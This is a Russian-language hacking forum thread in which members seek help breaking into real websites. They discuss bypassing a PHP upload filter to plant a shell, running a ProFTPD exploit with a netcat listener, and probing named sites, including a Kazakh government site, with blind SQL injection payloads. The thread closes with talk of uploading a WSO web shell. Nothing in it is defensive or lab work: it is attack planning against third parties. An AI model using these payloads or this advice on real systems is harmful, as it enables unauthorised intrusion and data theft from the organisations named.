Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Реально ли как-то обойти такого рода функцию проверки расширений файлов и залить скажем исполняемый файл?

    PHP:
    if(!empty($upload)){
        
    $errore='';
        for(
    $i 1$i <= 5$i++){
            if(!empty(${
    'name'.$i})){
                if((
    strrchr(${'name'.$i.'_name'},".")==".doc") OR (strrchr(${'name'.$i.'_name'},".")==".xls") OR (strrchr(${'name'.$i.'_name'},".")==".zip") OR (strrchr(${'name'.$i.'_name'},".")==".exe") OR (strrchr(${'name'.$i.'_name'},".")==".pdf") OR (strrchr(${'name'.$i.'_name'},".")==".rar") OR (strrchr(${'name'.$i.'_name'},".")==".mp3")){
                    
    move_uploaded_file("${'name'.$i}""../../Files/${'name'.$i.'_name'}");
                    if(
    is_file("../../Files/${'name'.$i.'_name'}")){
                        if(
    chmod("../../Files/${'name'.$i.'_name'}",0777)){
                        }
                        else{
                            
    $parse=$Errore_ChmodFile;
                        }
                    }
                }
                else{
                    
    $errore.=${'name'.$i.'_name'}." ";
                }
            }
        }
        if(
    $errore!=''){
            
    header("location:files.php?parse=$parse&errore=$errore");
        }
        else if(
    $errore=''){
            
    header("location:files.php?parse=$parse");
        }
    }
     
  2. james00x

    james00x New Member

    Joined:
    6 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Привет, нашел в сервер
    220 ProFTPD 1.3.2e Server (ProFTPD)
    Система UNIX, ну вот ехploit нашел такой www.exploit-db.com/exploits/15449/
    У меня ест ТП-Линк - я там поставил виртуал сервер
    ID Service Ports IP Address Protocol Status
    1 45295 192.168.1.100 ALL Enabled
    чтобы работала порт, тогда с netcat открыл тот порт через cmd.

    C:\nc>nc -lvp 45295
    listening on [any] 45295 ...

    ладно тогда открываю новы cmd и запускаю перл ехплоит.
    Ничего не происходит, я все сделал правильна? Если я чекаю тот порт например, тогда он закрывается, показывает кто чекал.
    Если все сделал правильно тогда проста там все ок?
     
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    первое что попалось - http://www.youtube.com/watch?v=k9xe55gq2fc
    уверен, на ачате есть еще способы, стоит только посмотреть внимательней

    как вариант можно крутить как слепую инъекцию
    Code:
    http://www.edu.ru/index.php?page_id=50&op=word&wid=509+and+substring%28version%28%29,1,1%29=5--+
     
  4. NetAng

    NetAng Member

    Joined:
    29 Dec 2010
    Messages:
    75
    Likes Received:
    12
    Reputations:
    5
    на слепую ругаеться, видимо слишком длинные запросы не проходят.
     
    1 person likes this.
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    Code:
    http://forum.prodom.ru/viewtopic.php?p=3805'
    не выходит раскрутить.
     
    _________________________
    1 person likes this.
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=1/* true
    http://forum.prodom.ru/viewtopic.php?p=3805/**/and/**/1=0/* true

    Думаю нет скульи.
     
    2 people like this.
  7. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    www.ctgroup.kz/?op=mi=node_2566=,view_2599
    дальше одного столбца не продвинулся :( что не так?
     
    1 person likes this.
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Там нет инъекции.
     
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    Почему ты так решил?
     
    _________________________
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    nemaniak, нереально.
    PHP:
    strrchr(${'name'.$i.'_name'},".")==".doc"
    strrchr берет все после точки. Eсли будет shell.php%00.jpg, shell.php.jpg, то на проверку идет:
    php%00.jpg
    php.jpg
    И проверку не пройдет. Как то так.

    HAXTA4OK,
    http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=1 false
    http://www.ctgroup.kz/?op=mi=node_2566=,view_2599+and+1=0 false
    не?
     
    #19290 Ereee, 7 Feb 2012
    Last edited: 7 Feb 2012
    1 person likes this.
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    Ereee
    http://www.ctgroup.kz/?op=mi=node_2744' and 2>5+--+=,view_2599 False
    http://www.ctgroup.kz/?op=mi=node_2744' and 2>1+--+=,view_2599 True
    не??

    Главное = не юзать
     
    _________________________
    2 people like this.
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    HAXTA4OK,
    спасибо, незнал. А почему:
    http://www.ctgroup.kz/?op=mi=node_2744' and substring(version(),1,1)>1+--+=,view_2599
    false? Не могу понять...


    P.S. Думаю на фильтры... Хотя... нет.
     
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,308
    Reputations:
    1,557
    Нужно копать в сторону второго запроса
    Вывод где-то рядом

    На самой странице результаты могут быть не видны. Ищите в исходнике по тексту
    PHP:
    <script>$(".l").hide(1);</script>
     
    1 person likes this.
  14. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Всем хай, вот не могоу раскрутить скулу, вобще возможно ли провести тут sqli или нет если да то каким запросом.
    http://www.mk.gov.kz/?lang=kaz&id_open_rubric=806'
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    у меня есть шансы на заливку?

    2Ereee, ну да, только как
     
    _________________________
    #19295 yarbabin, 7 Feb 2012
    Last edited: 7 Feb 2012
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    anonym_di,
    фильтры фильтры...

    faza02,
    шансы всегда есть =)
     
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605

    Залить то зальешь, правда криво шелл может будет работать
     
    _________________________
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    на этом сервере еще есть сайты, стоит их копать, или конфиг везде такой будет?
     
    _________________________
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Везде такой. WSO будет нормально пахать, правда не порутаешь.
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    хорошо, спасибо.
    а какие еще функции есть, которые не выключены, и через которые можно залить? :)
     
    _________________________
Loading...
Thread Status:
Not open for further replies.